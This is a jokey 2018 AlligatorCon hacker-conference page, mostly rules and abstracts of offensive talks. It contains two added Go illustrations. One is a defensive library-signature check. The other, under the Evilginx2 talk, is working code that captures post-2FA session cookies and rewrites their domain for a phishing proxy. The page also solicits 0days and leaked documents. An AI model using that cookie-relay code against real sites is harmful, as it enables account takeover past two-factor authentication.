TOP SECRET//SI//REL USA, FVEY National Security Agency/Central Security Service Information Paper 0x4849205448455245
Alligator Europe Security Conference 2018
31 August & 1 September @ Areszt śledczy - Kraków, Poland aka PiSland

-= [ AlligatorCon Europe 2018] =-
TOP SECRET - FOR YOUR EYES ONLY - DID YOU REALLY WAIT THIS LONG JUST TO SEE IF THE TEXT CHANGED? WELL CONGRATULATIONS, IT DOES, AND ONLY *YOU* KNOW ABOUT IT!

The Alligators roam the streets of Kraków again! Just like every year, we changed the venue and date. Why? Because why the hell not. At least you know you'll never be bored with us. Some things never change though. Entry is and always will be 100% free. It's invite only, but hacking the registration web page still counts as a valid way to get an invite. We have no sponsors and no sponsored content during the talks. The venue address and the location of all parties will be revealed at the last possible moment, only to those who were invited, and you should not reveal them to anyone else. We do welcome donations to keep the party going. All currencies are accepted, fiat or virtual. 0days and leaked documents are welcome as well; if you drop us any, they will be shared on the torrents just for the lulz. As a last-minute surprise, we are also having a workshop on Thursday, one day before the event. Seats are a FIFO queue (first come, first served), so if you want to attend make sure to send us an email ASAP.
[--- Rules of the Alligator
  • You do not talk about Alligator.
  • You do not talk about Alligator.
  • If this is your first night at Alligator, you have to hack.
  • You can present using your IRC nick, Twitter handle, whatever the hell you want but never with your real name. Remember what Joey said, you don't have an identity until you have a handle.
  • No cameras unless explicitly allowed by everyone in the picture, and no videos of the talks. There's no need to make it easy for the spooks.
  • The contents or even the title of some talks may not be public, on request of the speaker. Never discuss them after Alligator ends, or you'll be banned forever. And we mean it.

    Remember, kids: what happens in Kraków, stays in Kraków!
[--- Registration
If you've already received your invite token, you can redeem it here. The email address MUST be valid, but we recommend creating a new one, NOT tied to your identity, just for this. Good OPSEC is proactive, not retroactive!
If you're invited and haven't got your token, drop us an email at and let us know.
[--- I am Jack's list of talks

Hours of MS Paint went into this image.

Title: Lightning Talks
Speaker: .*
Country of origin: .*
A slot will be reserved for lightning talks. Just get up on stage and talk about whatever you want. Worst that can happen, we throw pierogi at you.

[--- Title: Heap, heap, hurra! ... or maybe not!
Speaker: @barbieauglend
Country of origin: 🌍 The Internet
The modern world depends and relies on the security (and safety!) of software. Protecting privacy, intellectual property, customer data and even national security are goals for most of us. Analysis tools can help us get new insights that can be used to secure software and hardware by identifying vulnerabilities and issues before they cause harm downstream. Automatic exploit generation is an old challenge in the industry that is not totally solved - in fact, we are far away from it, as Julien Vanegue stated in May this year. Furthermore, AEG is limited right now to stack-based buffer overflows and format string exploits, as the semantic information about user bytes in memory is not available. In this talk I will show a proof of concept for automated heap exploit generation on an x86 architecture, using symbolic execution and SMT solvers.

[--- Title: Infecting files on-the-fly (OTF)
Speaker: Fuego Fatuo
Country of origin: 🇪🇸 Fariñaland
Infecting files during a MITM attack is a common malware infection vector. Several tools exist to do it: free tools, commercial tools, even leaked tools. These tools have several drawbacks, such as no real on-the-fly infection and infection of PE files only. I will present some techniques to avoid those drawbacks. The talk will not only be PE-centric; I will talk about OTF infection of other file types. The topics covered are the state of the art, reverse engineering file types, ways to infect, and protocol abuse. I will also use an open source tool I developed for these tasks.
[--- Title: The Return of Software Vulnerabilities in the Brazilian Voting Machine
Speaker: TheSpider
Country of origin: 🇧🇷 Huehueland
This presentation shows a detailed and up-to-date security analysis of the voting software used in Brazilian elections. It is based on results obtained by the authors in a recent hacking challenge organized by the Superior Electoral Court (SEC), the national electoral authority. During the event, multiple serious vulnerabilities were detected in the voting software, which when combined compromised the main security properties of the equipment, namely ballot secrecy and software integrity. The insecure storage of cryptographic keys, hard-coded directly in source code and shared among all 500,000 machines, allowed full content inspection of the software installation memory cards, after which two shared libraries missing authentication signatures were detected. Injecting code into those libraries opened the possibility of executing arbitrary code on the equipment, violating the integrity of the running software. We trace the history of the vulnerabilities to a previous security analysis, providing some perspective about how the system evolved in the past 5 years.

[--- Title: Attacking Kubernetes
Speaker: "The Donald" @ White House
Country of origin: 🇺🇸 Mordor
This talk focuses on a popular containerization tool called Kubernetes. Common implementations of Kubernetes are not secure by default, and a lot of information about hardening is not known to the public. Since version 1.7 the security level has increased and common security misconfigurations have been mitigated. During this talk it will be demonstrated what happens if these mitigations are not applied and how to abuse them. The talk will be about both securing and attacking the platform and could be considered a 'purple team' talk. Multiple live demos are planned, most of them ending in a guest-to-host escape and a root shell.
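The two weaknesses the voting-machine abstract above describes, a key hard-coded in source and shared by every machine, and shared libraries loaded without any signature check, are both addressed by one pattern: ship a signed digest of each library and verify it with a public key before the library is loaded. The Go program below is an added illustration of that check written for this page; it is not the speakers' code and has nothing to do with the real Brazilian system. The manifest format, the library name libvoto.so and the library bytes are made up for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// LibraryManifest is a hypothetical record a build server would ship next to each
// shared library on the installation media: the library's SHA-256 plus an Ed25519
// signature over (name, digest). Only the build server holds the signing key; the
// machine carries nothing but the public key.
type LibraryManifest struct {
	Name   string
	Digest [32]byte
	Sig    []byte
}

// signedPayload is the exact byte string that gets signed. The length prefix keeps
// "a"+"b..." from colliding with "ab"+"..." (a classic concatenation ambiguity).
func signedPayload(name string, digest [32]byte) []byte {
	buf := make([]byte, 4, 4+len(name)+32)
	binary.BigEndian.PutUint32(buf, uint32(len(name)))
	buf = append(buf, name...)
	return append(buf, digest[:]...)
}

// SignLibrary runs on the build server, the only place the private key exists.
func SignLibrary(priv ed25519.PrivateKey, name string, lib []byte) LibraryManifest {
	m := LibraryManifest{Name: name, Digest: sha256.Sum256(lib)}
	m.Sig = ed25519.Sign(priv, signedPayload(m.Name, m.Digest))
	return m
}

// VerifyBeforeLoad is what the machine would run before dlopen()ing a library.
// Copying the memory card yields only the public key, so it gives an attacker
// nothing with which to produce a valid manifest for modified code.
func VerifyBeforeLoad(pub ed25519.PublicKey, m LibraryManifest, lib []byte) error {
	// Authenticate the manifest first; its fields are untrusted until the signature checks out.
	if !ed25519.Verify(pub, signedPayload(m.Name, m.Digest), m.Sig) {
		return errors.New("manifest signature invalid")
	}
	if sha256.Sum256(lib) != m.Digest {
		return errors.New("library bytes do not match signed digest")
	}
	return nil
}

// DemoTamperDetection builds a signed library and tries three loads: the genuine
// bytes, a one-byte patch (the "injecting code" case from the abstract), and a
// patched library re-signed with a key the attacker generated. It returns the
// three verification results so a caller can check them.
func DemoTamperDetection() (genuine, patched, forged error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	lib := []byte("\x7fELF constructed stand-in for libvoto.so bytes") // constructed, not a real ELF
	m := SignLibrary(priv, "libvoto.so", lib)

	genuine = VerifyBeforeLoad(pub, m, lib)

	evil := append([]byte(nil), lib...)
	evil[10] ^= 0xff // attacker patches the library on the card
	patched = VerifyBeforeLoad(pub, m, evil)

	// Attacker re-signs the patched library with their own key: digest matches, signature does not.
	_, attackerPriv, _ := ed25519.GenerateKey(rand.Reader)
	forged = VerifyBeforeLoad(pub, SignLibrary(attackerPriv, "libvoto.so", evil), evil)
	return
}

func main() {
	g, p, f := DemoTamperDetection()
	fmt.Println("genuine:", g)
	fmt.Println("patched:", p)
	fmt.Println("forged: ", f)
}
```

The design point is the asymmetry: a shared symmetric key, hard-coded as the abstract describes, both decrypts the card and, if used for integrity, lets anyone who reads it re-sign modified code; a public verification key on the device does neither. The remaining work in a real deployment is protecting the public key itself and the verifier from the same patching, which is where hardware-rooted boot comes in.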
[--- Title: I'm gonna get your crypto exchange down
Speaker: Doctore
Country of origin: 🇵🇱 PiSland
Crypto is taking over the world. So many coins (mostly shitcoins, but who cares?), so many exchanges and wallets online. As someone said, “You can either rob a conventional bank or a crypto currency company. Both have millions, but unlike traditional banks, cryptocurrency companies are startups with only 20 people.” Hundreds of billions of dollars are lying on the street waiting to be picked up. And you, on the other side, want to rule them all! This talk will show you how to start with an easy pentest of a cloud crypto wallet dedicated to a particular coin and end up shutting down the crypto exchange, with the GDPR in the background. No demo because it’s down :(

[--- Title: Catch me if you can. I’m behind 7 proxies.
Speaker: kukabeludo
Country of origin: 🇧🇷 Huehueland
Privacy is a dream that is far from being a reality in our lives. But how can we reduce the impact of surveillance? The adversaries’ ability to compromise TOR RELAYS is undermining our trust in anonymous networks such as TOR, but this war is not totally lost. How do we defeat the compromised TOR relays? The ability to read all your text messages, including but not limited to emails, SMS messages, Telegram, WhatsApp and Signal conversations, and let’s not forget all your phone calls, gives the adversary total control over your communication channels. What about the alternatives? Giving special attention to the problems related to the TOR network, this presentation will analyze some de-anonymization techniques which allowed surveillance agencies to identify TOR users. I will propose an approach to invalidate those techniques. The idea is to reduce and hinder powerful attacks such as data correlation attacks, even considering that your adversary has fully compromised TOR RELAYs and your sensitive data is prone to pass through those compromised relays. As a bonus I will present a tool which solves the principal TOR NETWORK issues like:
  • Stability: TOR is considered an unstable network. The packet loss is high and it seems to be an eternal problem for this kind of anonymous network. How do we solve this issue?
  • Speed: The anonymity behind the TOR network is based on the capability of this network to make your connection hop a couple of times before reaching the final destination. Those hops can happen in countries on different continents, and this slows down the speed of the TOR NETWORK. My solution allows you to watch movies in High Resolution on YOUTUBE and use the TOR network for everything without feeling the pain of using a considered “slow network”.
  • Compromised Relays: The number of compromised TOR relays is increasing. The adversary can intercept your data even inside the anonymous network. This tool reduces the chances of a successful data correlation.
In fact, how to transport sensitive data is only one item on your list of concerns. We will see how to reduce the chances of a successful attack against 2FA mechanisms, passwords and encryption, and see simple solutions to old but huge issues like how to manage your passwords.

[--- Title: Phishing 2FA Tokens with Evilginx2
Speaker: @mrgretzky
Country of origin: 🇵🇱 PiSland
Phishing has been the most popular attack vector since forever, and it is still in great shape. In order to make the attacker's life harder, companies implement various forms of two-factor authentication for users, as an extra layer of protection for their accounts. This deters bad guys who phish only for login credentials, but not those who are also able to intercept session tokens. In my presentation I will show off Evilginx2 to debunk the myth that 2FA provides rock-solid defense against phishing attacks. Brace yourselves, as there will be live demos of haxxx and much excitement coming from account pwnage.

[--- Title: The Hitch-hacker's guide to (gain access to) the internal network
Speaker: @adon90 & @rockajansky
Country of origin: 🇪🇸 Fariñaland
TL;DR: We will present several procedures to obtain access to the internal network while attacking from the Internet that have been successfully carried out in real-case scenarios during Red Team exercises. The attack vectors were the exploitation of diverse web application vulnerabilities (one of them in a SAP, a combination of vulnerabilities that led to RCE) and also different ways to achieve RCE from an Office document, some of them macro-less, for phishing & fun. Technical stuff inside guaranteed. Pentesting may be a boring adventure sometimes. But other times, a little thread is found in the process and, pulling it, it leads to satisfying exploitations that end up allowing you access beyond the external perimeter.
In this talk several cases will be detailed, including one performed on a SAP asset by modifying an exploit for a vulnerability that was supposed to be present only in the authenticated part of the application... but no login was needed. But as everyone knows, the human factor is usually the weakest link of the chain, and that attack vector could be an easier way to reach the internal network. Two milestones during a Red Team exercise were enough motivation to research RCE from Word documents for phishing campaigns: access to an SMTP server through a Path Traversal vulnerability, plus obtaining a couple of valid credentials for employees' email accounts by a brute-force attack against an OWA Exchange server. We will also briefly discuss Windows LOLBins used for RCE during tests, combined with VBS scripts, XML, PowerShell commands, etc. We are still doing some research about that and about responses from AVs.

[--- Title: Compile-time Memory Corruption Mitigations: Current State of Affairs
Speaker: ad
Country of origin: 🇵🇱 PiSland
Memory corruption mitigations have been an active area of research for more than a decade now, both compile-time and run-time. In this talk we will take a look at the current landscape of the former (compile-time) for mainstream compilers. We will dig into details and read some assembly, which will help us understand all the "Why's", "How's" and "When's".

[--- Title: Making the USD
Speaker: buherator
Country of origin: 🇭🇺 Not Romania
Surprise warez! If you want to know more, you'll have to be here!

[--- Title: Bad signals - weaponize 2G, 3G and 4G roaming network attacks
Speaker: c0decafe
Country of origin: 🇩🇪 We didn't dare to make the obvious joke about this one
Weaknesses of SS7 roaming networks are well known – but what about the Diameter interfaces coming up at the moment? Diameter is and will be used for roaming connections of LTE/LTE-A mobile networks - a new architecture, and a new implementation.
But still, one thing remains the same: it is an AAA protocol designed for trusted environments - roaming interconnection interfaces between providers. As we know from the past, it is possible to get access to such networks, as you can simply buy access if you spend enough money; as typical attackers in such environments are fraudsters or agencies, they definitely will. Therefore, securing these interfaces and assessing the infrastructure components and their configuration is very important. In our talk, we will explain not only how Diameter-based networks work and which messages and functions exist, but also which of them can be abused by attackers. Typical attacks are information leaks about the environment, but also attacks against the authentication and encryption of customers. This information can be used for interception of mobile data/calls, but also to establish new business models of fraud. To demonstrate such attacks, we developed a testing framework covering information gathering, mobile phone tracking, denial of service attacks, pay fraud, and interception of data. The framework will be released during our talk and will enable providers and security companies to assess a telco's Diameter network configuration and demonstrate what can happen if no proper security measures are applied. We will also give an outlook on how a provider can protect itself from such attacks.
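The session-token interception behind the Evilginx2 talk above works because a reverse proxy sits between the victim and the real site, relays the password and the second-factor code unchanged, and then keeps the cookie the real site issues once the second factor has been accepted. The Go fragment below is an added illustration of the cookie-handling half of that mechanism, written for this page; it is not Evilginx2's code or the speaker's. The hostnames, cookie names and values are constructed for the example.

```go
package main

import (
	"fmt"
	"net/http"
	"strings"
)

// CapturedCookie is what the relay records once the victim has completed the
// login including the 2FA step: a session cookie issued by the real site.
type CapturedCookie struct {
	Name, Value, OriginalDomain string
}

// RelaySetCookies does the two things a phishing reverse proxy must do to a
// response coming back from the real site: (1) record every Set-Cookie so the
// operator obtains the post-2FA session token, and (2) rewrite the cookie's
// Domain to the phishing host, so the victim's browser keeps sending it back
// through the proxy instead of dropping it as a cookie for a foreign domain.
func RelaySetCookies(resp *http.Response, phishHost string) []CapturedCookie {
	cookies := resp.Cookies() // parses every Set-Cookie header on the response
	if len(cookies) == 0 {
		return nil
	}
	captured := make([]CapturedCookie, 0, len(cookies))
	resp.Header.Del("Set-Cookie")
	for _, c := range cookies {
		captured = append(captured, CapturedCookie{Name: c.Name, Value: c.Value, OriginalDomain: c.Domain})
		c.Domain = phishHost
		resp.Header.Add("Set-Cookie", c.String()) // Secure/HttpOnly flags survive the rewrite
	}
	return captured
}

// IsSessionBearer is the operator-side triage: cookie names that commonly carry
// the authenticated session. The list is a constructed heuristic, not from the page.
func IsSessionBearer(name string) bool {
	n := strings.ToLower(name)
	return strings.Contains(n, "sess") || strings.Contains(n, "auth") || strings.Contains(n, "token")
}

// ConstructedResponse builds the response the real site would return right after
// the victim submitted a correct 2FA code. Everything in it is made up.
func ConstructedResponse() *http.Response {
	h := http.Header{}
	h.Add("Set-Cookie", "SESSIONID=9f2c1e7a; Domain=login.example.com; Path=/; Secure; HttpOnly")
	h.Add("Set-Cookie", "lang=en; Domain=login.example.com; Path=/")
	return &http.Response{StatusCode: 302, Header: h}
}

func main() {
	resp := ConstructedResponse()
	for _, c := range RelaySetCookies(resp, "login.example-secure.net") {
		tag := ""
		if IsSessionBearer(c.Name) {
			tag = "  <-- replaying this makes the 2FA code irrelevant"
		}
		fmt.Printf("%s=%s (was for %s)%s\n", c.Name, c.Value, c.OriginalDomain, tag)
	}
	fmt.Println("rewritten:", resp.Header["Set-Cookie"])
}
```

The caveat a defender should take away: any second factor the user types or taps (TOTP, SMS, push approval) is relayed to the real site exactly like the password, so it buys nothing against this proxy; the value worth stealing is the session cookie issued afterwards. An origin-bound authenticator (FIDO2/WebAuthn, U2F) behaves differently, because the browser signs the phishing origin into the assertion and the real site rejects it, which is why it is the usual recommendation against proxy phishing.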
[--- I am Jack's list of workshops
[--- Title: BLE security workshop
Speaker: smartlockpicking
Country of origin: 🇵🇱 PiSland
In this workshop you will get familiar with the basics of BLE security. We will work on a dedicated, readily available piece of BLE hardware, an nRF devkit. In minutes you will turn into an embedded developer and learn how to program your own BLE device yourself, using a free web interface and ready-made templates. Next, from the attacker's perspective, we will cover among others: sniffing, spoofing, MITM, replay and relay. Time permitting, we will play with a collection of vulneraBLE smart locks, sex toys and other devices. The takeaway hardware included will allow you to experiment and repeat the exercises later at home. The hardware pack includes:
  • nRF BLE devkit that can be flashed as a BLE RF sniffer, or a BLE device to attack
  • ST-Link debugger for flashing the devkit firmware
  • 2xBLE USB dongles
Please bring:
  • contemporary laptop that can run Kali Linux in a VM (roughly 4 GB RAM, 20 GB disk space), with the VM software of your choice installed (VirtualBox or VMware), and at least 2 USB ports available
  • smartphone with BLE support, preferably Android (at least 4.3) or iPhone (at least 4s)
  • if you have Raspberry Pi 3, you can bring it too
  • you can also bring your own BLE devices
[--- Life insurance pays off triple if you die on a conference trip
The recommended place for your stay in Kraków is the 5 star hotel Areszt Śledczy Kraków-Podgórze. Just knock on the door, tell them all about your hacking feats, and you'll find nice people who will be more than happy to let you in - for free! With some luck you can even score a presidential suite if you are bald and dressed in sportswear. Alternatively, here are a few (possibly more comfortable) venues you can try out: if you're on a budget, the Greg & Tom hostel at Ul. Florianska is quite decent, centrally located and has a nice bar too. Additionally, this city has a really amazing CouchSurfing community that you should definitely reach out to. You're also welcome to bring a sleeping bag and crash at a friendly local hacker's home, a popular choice of Alligator attendees every year. Transport arrangements are prepared for the occasion in the form of a rusty van with the words FREE CANDY spray-painted on the side and the picture of a funny bear you may have seen on 4chan before. Trust the nice man with the moustache, he'll take you where you want to go.

Seems legit.

There are also the 208, 292 and 902 buses from the Kraków airport to the city center as well as a train to the main station, or you can alternatively fly to Warsaw or Katowice and go from there to Kraków by train (it's sometimes cheaper). But there's no free candy in those.
[--- We are the all singing, all dancing crap of the infosec world
The venerable Organizing Committee for this year will be:
  • Kurwa Malpka & Count Crapula, the original chaos monkeys
  • Xava Kosmosach on web design
  • Santaplix @ Hackerstrip on original artwork
  • Toxic Avenger as our BOFH
  • Donald Trump on motivational speeches
  • Shia LaBeuf as our personal life coach
  • ...and always with us, Our Lord Satan whom we praise
[--- Sponsors
This event is proudly sponsored by: Soplica Vodka, Paper Street Soap Company, The George Soros Foundation, Russian Ministry of Fake News and Propaganda, Lifetime President of China Xi Jinping, His Majesty King T'Challa of Wakanda, and many others who prefer to remain anonymous but the NSA already knows who you are. No, seriously. They know everything. Run. Run for your lives. This year we will be missing the iconic old dude of Kazimierz, Mikołaj. May you roam the bars of Infinity now, old pal.

0x4849205448455245 [EOF]